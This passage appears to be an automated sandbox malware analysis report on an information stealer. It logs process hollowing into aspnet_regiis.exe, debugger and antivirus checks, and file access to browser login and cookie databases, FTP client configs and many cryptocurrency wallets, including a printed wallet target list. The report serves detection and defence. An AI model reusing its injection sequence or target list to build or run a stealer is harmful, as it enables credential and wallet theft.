                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                          Source: aspnet_regiis.exe, 00000003.00000003.2530658273.0000000002FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-75721
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-75737
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-77061
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E81019C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E81019C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00418950
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]3_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]3_2_0040148A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]3_2_004014A2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00418599 mov eax, dword ptr fs:[00000030h]3_2_00418599
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041859A mov eax, dword ptr fs:[00000030h]3_2_0041859A
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E813810 GetProcessHeap,0_2_6E813810
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E80BCC7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E80BCC7
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E81019C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E81019C
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E80C1F2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E80C1F2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041D016
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041D98C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042762E SetUnhandledExceptionFilter,3_2_0042762E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7CB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C7CB66C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C7CB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C7CB1F7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6C97AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C97AC62
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 2960, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 5576, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E7F9DF0 GetGameData,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,Wow64GetThreadContext,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,WriteProcessMemory,ResumeThread,0_2_6E7F9DF0
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_004124A8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_0041257F
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 401000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 430000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 43D000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 670000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 671000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2BD2008Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E80C3B8 cpuid 0_2_6E80C3B8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_00410DDB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0042B0CC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_0042B1C1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00429A50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_0042B268
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_0042B2C3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_0042AB40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,3_2_004253E3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_0042B494
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,3_2_0042749C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: EnumSystemLocalesA,3_2_0042B556
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00429D6E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_0042E56F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00427576
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_00428DC4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0042B5E7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0042B580
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_0042B623
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoA,3_2_0042E6A4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6E80BE3B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6E80BE3B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00410C53 GetProcessHeap,RtlAllocateHeap,GetUserNameA,3_2_00410C53
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,3_2_00410D2E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.2.file.exe.6e820000.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6e820000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6e7f0000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 2960, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 5576, type: MEMORYSTR
                          Source: aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe, File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                          Source: Yara match File source: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: aspnet_regiis.exe PID: 5576, type: MEMORYSTR

                          Remote Access Functionality

                          Source: Yara match File source: sslproxydump.pcap, type: PCAP
                          Source: Yara match File source: sslproxydump.pcap, type: PCAP
                          Source: Yara match File source: 0.2.file.exe.6e820000.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.file.exe.6e820000.6.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 3.2.aspnet_regiis.exe.400000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 3.2.aspnet_regiis.exe.400000.1.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 0.2.file.exe.6e7f0000.4.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara match File source: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: file.exe PID: 2960, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: aspnet_regiis.exe PID: 5576, type: MEMORYSTR
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6C980C40 sqlite3_bind_zeroblob,3_2_6C980C40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6C980D60 sqlite3_bind_parameter_name,3_2_6C980D60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6C8A8EA0 sqlite3_clear_bindings,3_2_6C8A8EA0
